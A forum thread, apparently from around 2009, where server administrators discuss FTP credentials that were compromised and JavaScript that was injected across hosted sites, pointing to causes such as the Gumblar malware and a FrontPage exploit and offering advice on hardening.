Hi,

One of the servers we manage appears to have had its FTP comprised for at least two of the sites hosted on it. The sites both had very complex passwords, over 15 random characters including letters, number and symbol characters, meaning they would have been very hard to brute force, also there is nothing in the logs on the server to suggest it was a bruce force attack.

The attacker injected a function into all the Javascript files on the server as per this blog post:

http://blog.unmaskparasites.com/2009/05/07...njected-script/

As it doesn't appear to have been bruce forced then I can only think of two possibilities on how they got these passwords, either:

1) They managed to get them from the site owner

2) They sniffed them from TCP/IP packets

I would suggest 2 is the more likely possibility as the passwords were only known to a couple of people and this would therefore imply it could a comprised router somewhere (which in theory could be anywhere).

Has anyone else experienced this type of attack in the last couple of days?

Regards,

da644

Few of my sites have been hacked recently. Scripts were injected. As far as I can see they look like this:



or:



any ideas?

Checkout the gumblar virus, it infects a client PC, steals the passwords, and exploits the websites. Sounds like what may be happening here...did the users save their passwords?

Usually a malicious software steals FTP passwords on client side. But the FTP daemon could be compromised if configured improperly.
I can recommend to install pureftp (very secure FTP daemon) and follow the guide to secure pureftp

Does any site on the server use Front Page? There was an exploit specific to Front Page on WHM that allows read access to the domlogs folder to determine what is hosted on the server and write access to all websites. You might try turning Front Page off to see if this blocks the access.